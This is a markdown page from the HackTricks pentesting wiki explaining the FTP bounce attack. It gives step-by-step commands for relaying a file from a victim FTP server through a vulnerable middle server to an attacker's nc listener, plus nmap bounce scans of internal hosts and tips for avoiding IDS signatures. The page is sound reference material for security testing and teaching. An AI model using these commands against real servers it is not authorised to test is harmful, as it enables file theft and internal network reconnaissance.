ftp-bounce-download-2oftp-file.md (5189B)
1 --- 2 title: "FTP Bounce Download 2 of FTP File" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # FTP Bounce Download 2 of FTP File 14 15 ## Resume 16 17 If you have access to a **bounce FTP server**, you can make it request files of **another FTP server** (where you know some credentials) and download that file to **your own server**. 18 19 ## Requirements 20 21 - FTP valid credentials in the **FTP Middle server** 22 - FTP valid credentials in **Victim FTP server** 23 - The middle server accepts a **third-party `PORT` destination** (the behavior used by proxy FTP/FTP bounce); the victim accepts the resulting control and data-flow commands.<sup>[[4]](#references)</sup> 24 - You can **write** inside some directory of the **FTP Middle server** 25 - The middle server has **more access** inside the Victim FTP Server than you 26 27 ## Steps 28 29 1. Connect to **your own FTP server** and make the connection passive (`pasv` command) so it **listens** in a directory where the victim service will send the file. 30 2. Craft the file the FTP Middle server will send to the Victim server (the **exploit script**). This file will be plain text with the needed commands to authenticate against the Victim server, change the directory and download a file to your own server. 31 3. Connect to the **FTP Middle Server** and upload the previous file. 32 4. Make the FTP Middle server **establish a connection** with the Victim server and send the exploit file. 33 5. **Capture** the file in your own FTP server. 34 6. **Delete** the exploit file from the FTP Middle server.<sup>[[3]](#references)</sup> 35 36 ## Quick check for vulnerable bounce hosts 37 38 - **Nmap** still supports FTP bounce checks. Example to verify a potential middle server:<sup>[[1]](#references)</sup> 39 40 ```bash 41 nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip> 42 # or directly attempt a bounce scan 43 nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip> 44 ``` 45 46 If the server refuses third‑party `PORT` values the scan will fail; some **embedded/legacy printers, NAS and appliance FTP daemons** still allow it.<sup>[[1]](#references)</sup> 47 48 ## Automating the 2nd FTP download 49 50 Below is a modernized way to pull a file through a vulnerable middle FTP server.<sup>[[3]](#references)</sup> 51 52 1. **Open a passive listener** on your attack box (any TCP sink works): 53 ```bash 54 nc -lvnp 2121 > loot.bin # or run a small pyftpdlib server 55 ``` 56 57 2. **Note** your IP as `A,B,C,D` and port `P` as `p1,p2` (`p1 = P/256`, `p2 = P%256`). 58 59 3. **Build the instruction file** that the middle server will replay to the victim: 60 ```bash 61 cat > instrs <<'EOF' 62 USER <victim_user> 63 PASS <victim_pass> 64 CWD /path/inside/victim 65 TYPE I 66 PORT A,B,C,D,p1,p2 67 RETR secret.tar.gz 68 QUIT 69 EOF 70 # Add padding so the control channel stays open on picky daemons 71 dd if=/dev/zero bs=1024 count=60 >> instrs 72 ``` 73 74 4. **Upload & trigger from the middle server** (classic proxy FTP): 75 ```bash 76 ftp -n <middle_ftp> <<'EOF' 77 user <middle_user> <middle_pass> 78 put instrs 79 PORT <victim_ip_with_commas>,0,21 80 RETR instrs 81 QUIT 82 EOF 83 ``` 84 85 5. **Grab the file** from your listener (`loot.bin`). 86 6. **Clean up** the uploaded `instrs` file on the middle server. 87 88 Notes: 89 - Padding (`dd ...`) prevents the control connection from closing before the RETR finishes (large TCP window issue discussed in classic writeups).<sup>[[3]](#references)</sup> 90 - Any service that can **listen and dump TCP** can replace the FTP PASV socket (e.g., `socat -u TCP-LISTEN:2121,fork - > loot.bin`). 91 - If the middle server restricts privileged ports, use a high port in `PORT` and adjust your listener accordingly. 92 93 ## Extra tricks 94 95 - Use a bounceable FTP server to **port-scan internal hosts** when file relay is blocked:<sup>[[2]](#references)</sup> 96 ```bash 97 nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip> 98 ``` 99 - Some modern WAF/IDS (e.g., Juniper IPS) ship signatures specifically for **FTP:EXPLOIT:BOUNCE-ATTACK**; noisy payloads or missing padding may trip them. 100 - When the middle server enforces "PORT to same host" restrictions, place your **listener on the middle server itself** (if you have write/execute) and forward the captured file later. 101 102 For a more detailed old-school walkthrough check: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)<sup>[[3]](#references)</sup> 103 104 ## References 105 106 - [1] [Nmap book – TCP FTP Bounce Scan (-b)](https://nmap.org/book/scan-methods-ftp-bounce-scan.html) 107 - [2] [CPTS Attacking Common Services – FTP Bounce example (2025)](https://www.chaostudy.com/2025/02/24/cpts-attacking-common-services/) 108 - [3] [The FTP Bounce Attack](http://www.ouah.org/ftpbounce.html) 109 - [4] [RFC 959 — FTP `PORT`, data connections, and server-to-server transfer](https://www.rfc-editor.org/rfc/rfc959.html)